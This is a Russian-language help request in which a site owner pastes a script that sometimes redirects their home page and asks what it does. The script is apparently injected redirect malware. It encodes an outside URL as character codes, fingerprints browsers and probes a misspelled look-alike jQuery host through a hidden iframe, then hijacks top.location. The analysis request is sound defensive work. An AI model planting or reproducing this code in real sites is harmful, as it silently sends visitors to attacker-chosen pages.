Здравствуйте! Периодически при входе на главную страницу сразу срабатывает редирект. Подскажите, что делает этот скрипт? Спасибо.
function adsonl() {
ades++;
ads_on(true)
}
function wionl() {
if (ades == 0) ads_on(false)
}
function adsonl2() {
ades2++;
ads_on(false)
}
function wionl2() {
if (ades2 == 0) ads_on(true)
}
function ads_on(e) {
var t = "";
var b = [104, 116, 116, 112, 58, 47, 47, 122, 122, 119, 103, 97, 101, 104, 112, 46, 115, 101, 120, 111, 98, 101, 101, 112, 46, 99, 111, 109, 47, 102, 117, 117, 103, 117, 112, 99, 99, 46, 112, 104, 112, 63];
var n = "002590C1FE15";
var r = "d26df46b940d466d7cbcec4ed5a018c4ba98858f889c1a116f78286767dc81";
if (!e) {
for (var i = 0; i < b.length; i++) {
t = t + String.fromCharCode(b[i])
}
top.location.href = t + n + "&pcode=" + r
}
}
function ffp() {
window.addEventListener("load", wionl, false);
var e = document.createElement("iframe");
e.style.display = "none";
e.src = purl;
e.onload = adsonl;
document.body.appendChild(e)
}
function cbb() {
var e = "ok";
var t = false;
sagent = sagent.toLowerCase().replace(/[()]/g, "");
var n = sagent.split(" ");
for (var r = 0; r < n.length; r++)
if (uagent.indexOf(n[r]) == -1) {
t = true;
break
}
if (t) e = "";
else if (sagent.indexOf("msie") != -1) {
if (typeof document.documentMode === "undefined" || window.ActiveXObject == false) e = "";
else ads_on(false)
} else if (sagent.indexOf("trident/") != -1) {
if (navigator.appName != "Netscape" || typeof document.documentMode === "undefined") e = "";
else ads_on(false)
} else if (sagent.indexOf("chrome") != -1) {
var i = !!window.chrome;
if (!i) e = "";
else {
window.addEventListener("load", wionl2, false);
var s = document.createElement("object");
s.data = purl;
s.onload = adsonl2;
document.body.appendChild(s)
}
} else if (sagent.indexOf("safari") != -1) {
if (Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor") > 0) ffp();
else e = ""
} else if (sagent.indexOf("firefox") != -1) {
if (typeof InstallTrigger !== "undefined") ffp();
else e = ""
} else e = "";
return e
}
var ades = 0;
var ades2 = 0;
var purl = "http://ajax.googleapis.cmo/ajax/libs/jquery/1.7.1/jquery.min.js";
var uagent = navigator.userAgent.toLowerCase();
var sagent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36";
cbb()